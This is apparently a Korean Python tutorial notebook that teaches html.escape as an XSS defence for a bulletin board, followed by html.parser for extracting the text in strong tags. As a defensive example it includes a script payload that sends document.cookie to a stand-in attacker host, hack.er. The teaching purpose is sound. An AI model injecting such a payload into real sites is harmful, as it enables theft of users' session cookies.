In [None]:
# 15장 마크업 언어 다루기
# 마크업(markup) 언어는 태그와 속성을 이용하여 문서나 데이터의 구조를 나타내는 언어의 한 가지이다. 
# 대표적인 것으로는 HTML과 XML 등을 들 수 있다. 이번 장에서는 HTML, XML과 관련된 파이썬 모듈을 알아본다.

## 082 XSS(Cross-Site-Scripting) 공격을 막으려면? ― html

In [None]:
# 082 XSS 공격을 막으려면? ― html

# html은 HTML 문자를 이스케이프(escape) 처리할 때 사용하는 모듈이다.

# HTML 문자를 이스케이프 처리하면 스크립트나 HTML 태그만 사라질 뿐 내용은 그대로 브라우저에서 확인할 수 있다. 
# 예를 들어 태그의 시작을 의미하는 < 문자를 이스케이프 처리하면 &lt;라는 문자로 바뀌며 이는 브라우저가 < 문자로 표시한다.

# 문제
# A씨는 직접 만든 게시판 프로그램을 운영 중이다. 그런데 어떤 사용자가 게시판 글을 등록할 때 다음처럼 자바스크립트를 삽입하여 
# 다른 사용자의 브라우저 쿠키를 탈취하려고 시도했다.

# <script>location.href="http://hack.er/Cookie.php?cookie="+document.cookie</script>


# A 씨는 이러한 ‘사이트 간 스크립팅’을 방지하고자 게시판 내용 중 HTML 태그는 이스케이프 처리하고자 한다. 
# 입력한 HTML 문자열을 이스케이프 처리하는 코드는 어떻게 작성하면 될까?


# 알아두면 좋아요

# 사이트 간 스크립팅

# 사이트 간 스크립팅(또는 크로스 사이트 스크립팅, 영문 명칭 cross-site scripting, 영문 약어 XSS)은 웹 애플리케이션에서 많이 나타나는 
# 취약점의 하나로 웹 사이트 관리자가 아닌 이가 웹 페이지에 악성 스크립트를 삽입할 수 있는 취약점이다. 
# 주로 여러 사용자가 보게 되는 전자 게시판에 악성 스크립트가 담긴 글을 올리는 형태로 이루어진다. 
# 이 취약점은 웹 애플리케이션이 사용자로부터 입력받은 값을 제대로 검사하지 않고 사용할 경우 나타난다. 
# 이 취약점으로 해커가 사용자의 정보(쿠키, 세션 등)를 탈취하거나 자동으로 비정상적인 기능을 수행하게 할 수 있다. 
# 주로 다른 웹 사이트와 정보를 교환하는 식으로 작동하므로 사이트 간 스크립팅이라고 한다.

# 출처: 위키백과-사이트 간 스트립팅 [웹사이트]. URL: https://ko.wikipedia.org/wiki/사이트_간_스크립팅


In [None]:
# 풀이
# 다음은 html 모듈을 사용한 문제 풀이이다.

# [파일명: html_sample.py]

# import html

# src = '<script>location.href="http://hack.er/Cookie.php?cookie="+document.cookie</script>'
# result = html.escape(src)
# print(result)
# html.escape() 함수를 사용하면 HTML 문자열을 쉽게 이스케이프 처리할 수 있다.

# 이 코드를 실행한 결과는 다음과 같다.

# c:\projects\pylib>python html_sample.py
# &lt;script&gt;location.href=&quot;http://hack.er/Cookie.php?cookie=&quot;+document.cookie&lt;/script&gt;

# 이처럼 이스케이프된 문자열은 브라우저에서는 입력한 그대로 보이지만 HTML 본연의 태그나 스크립트 기능은 사라진 상태이다.

# <script>location.href="http://hack.er/Cookie.php?cookie="+document.cookie</script>

# 알아두면 좋아요
# html.unescape()

# 이스케이프된 문자열을 원래의 HTML로 되돌릴 때는 html.unescap() 함수를 사용한다.

# >>> import html
# >>> result = html.escape("<script>Hello</script>")
# >>> result
# '&lt;script&gt;Hello&lt;/script&gt;'
# >>> html.unescape(result)
# '<script>Hello</script>'
# 참고
# html - 하이퍼텍스트 마크업 언어 지원: https://docs.python.org/ko/3/library/html.html

In [2]:
#html_sample.py

import html

src = '<script>location.href="http://hack.er/Cookie.php?cookie="+document.cookie</script>'
result = html.escape(src)
print(result)


&lt;script&gt;location.href=&quot;http://hack.er/Cookie.php?cookie=&quot;+document.cookie&lt;/script&gt;


## 083 웹 페이지에서 원하는 텍스트만 뽑으려면? ― html.parser

In [None]:
# 083 웹 페이지에서 원하는 텍스트만 뽑으려면? ― html.parser

# html.parser는 HTML 문서를 파싱할 때 사용하는 모듈이다.

# 문제
# 다음과 같은 HTML 파일이 있다고 할 때 굵은 글씨로 강조한 부분만 찾아 출력하고 싶다.

# [파일명: python_zen.html]

# <html>
# <head>
# <title>Python Zen</title>
# </head>
# <body>
# <h2>The Zen of Python, by Tim Peters</h2>
# <ul>
#   <li>Beautiful is better than ugly.</li>
#   <li>Explicit is better than implicit.</li>
#   <li>Simple is better than complex.</li>
#   <li>Complex is better than complicated.</li>
#   <li>Flat is better than nested.</li>
#   <li>Sparse is better than dense.</li>
#   <li>Readability counts.</li>
#   <li>Special cases aren't special enough to break the rules.</li>
#   <li>Although <strong>practicality</strong> beats purity.</li>
#   <li>Errors should <strong>never</strong> pass silently.</li>
#   <li>Unless explicitly silenced.</li>
#   <li>In the face of ambiguity, refuse the temptation to guess.</li>
#   <li>There should be one-- and preferably only one --obvious way to do it.</li>
#   <li>Although that way may not be obvious at first unless you're Dutch.</li>
#   <li><strong>Now</strong> is better than never.</li>
#   <li>Although never is often better than <strong>right</strong> now.</li>
#   <li>If the implementation is hard to explain, it's a bad idea.</li>
#   <li>If the implementation is easy to explain, it may be a good idea.</li>
#   <li>Namespaces are one honking great idea -- let's do more of those!</li>
# </ul>
# </body>
# </html>

# 이 HTML 파일에서 내용을 굵은 글씨로 표시하는 <strong> 태그와 </strong> 태그 사이의 문자열을 모두 찾아서 출력하는 프로그램을 만들려면 어떻게 해야 할까?

# 풀이
# html.parser 모듈을 사용하면 간단하게 이 문제를 해결할 수 있다.

# [파일명: html_parser_sample.py]

# from html.parser import HTMLParser


# class MyHTMLParser(HTMLParser):
#     def __init__(self):
#         HTMLParser.__init__(self)
#         self.is_strong = False

#     def handle_starttag(self, tag, attrs):
#         if tag == 'strong':  # <strong> 태그 시작
#             self.is_strong = True

#     def handle_endtag(self, tag):
#         if tag == 'strong':  # </strong> 태그 닫힘
#             self.is_strong = False

#     def handle_data(self, data):
#         if self.is_strong:  # <strong>~</strong> 구간인 경우
#             print(data)     # 데이터를 출력


# with open('python_zen.html') as f:
#     parser = MyHTMLParser()
#     parser.feed(f.read())

# html.parser의 HTMLParser 클래스를 상속한 MyHTMLParser 클래스를 생성했다. 
# handle_starttag() 메서드는 <html> 또는 <head> 와 같은 시작 태그가 열릴 때 호출한다. 이때 해당 태그명은 tag라는 매개변수로 전달한다. 
# 그리고 태그의 속성(attribute)도 매개변수 attrs로 전달한다. 
# handle_endtag() 메서드는 해당 태그가 닫힐 때 호출하고 마찬가지로 태그명은 매개변수 tag로 전달한다. 
# 그리고 handle_data() 메서드는 해당 태그 사이의 문자열을 매개변수 data로 전달한다.

# MyHTMLParser 클래스로 생성한 parser 객체의 feed() 함수에 파싱할 HTML 문자열을 전달하면 앞서 정의한 메서드를 호출한다. 
# MyHTMLParser는 <strong> 태그가 시작하면 is_strong 객체 변수를 True로 설정하고 <strong> 태그가 닫히면 is_storng을 False로 설정한다. 
# 그리고 handle_data() 메서드에서는 is_strong이 True일 때만 데이터를 출력하도록 했다.

# 이 코드를 수행한 결과는 다음과 같다.

# c:\projects\pylib>python html_parser_sample.py
# practicality
# never
# Now
# right
# <strong>과 </strong> 태그 사이의 문자열이 출력되는 것을 확인할 수 있다.

# 참고
# html.parser - 간단한 HTML과 XHTML 구문 분석기: https://docs.python.org/ko/3/library/html.parser.html